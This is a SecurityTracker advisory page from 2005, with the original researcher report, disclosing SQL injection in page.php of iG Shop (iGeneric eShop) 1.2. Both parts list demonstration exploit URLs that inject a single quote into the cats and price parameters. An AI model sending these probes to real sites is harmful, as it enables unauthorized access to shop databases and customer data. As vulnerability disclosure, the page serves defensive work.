SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   iG Shop Vendors:   igeneric.co.uk
iG Shop Input Validation Bugs Let Remote Users Execute SQL Commands
SecurityTracker Alert ID:  1013268
SecurityTracker URL:  http://securitytracker.com/id/1013268
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 23 2005
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 1.2
Description:   A vulnerability was reported in iG Shop. A remote user can inject SQL commands.

The 'page.php' script does not properly validate user-supplied input in several variables. A remote user can submit a specially crafted request to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/page.php?page_type=catalog_products&type_id[]=2
&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='

http://[target]/page.php?page_type=catalog_products&type_id[]=2
&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search
=1&l_price='&u_price=1&Submit=Search

http://[target]/page.php?page_type=catalog_products&type_id[]=2
&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search
=1&l_price=1&u_price='&Submit=Search

The vendor was notified on February 14, 2005 without response.

John Cobb reported this vulnerability.

Impact:   A remote user can execute arbitrary SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.igeneric.co.uk/display_resources/resource1.html (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [NOBYTES.COM: #5] iGeneric eShop 1.2 - Information Disclosure &


 
Hello All,

I have discovered multiple vulnerabilities in: iGeneric eShop 1.2

Authors Site: http://www.igeneric.co.uk

+-[Examples:]--------------------------------------------------+

Information Disclosure & Possible SQL Injection:

http://www.victimsite.com/page.php?page_type=catalog_products&type_id[]=2&SE
SSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='

http://www.victimsite.com/page.php?page_type=catalog_products&type_id[]=2&SE
SSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search
=1&l_price='&u_price=1&Submit=Search

http://www.victimsite.com/page.php?page_type=catalog_products&type_id[]=2&SE
SSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search
=1&l_price=1&u_price='&Submit=Search


+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 10/02/2005
Author(s) Informed on: 14/02/2005
Author(s) Response: None As Of Yet
Author(s) Fix: None As Of Yet


Regards

John Cobb

JohnC@NoBytes.com

http://www.nobytes.com



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC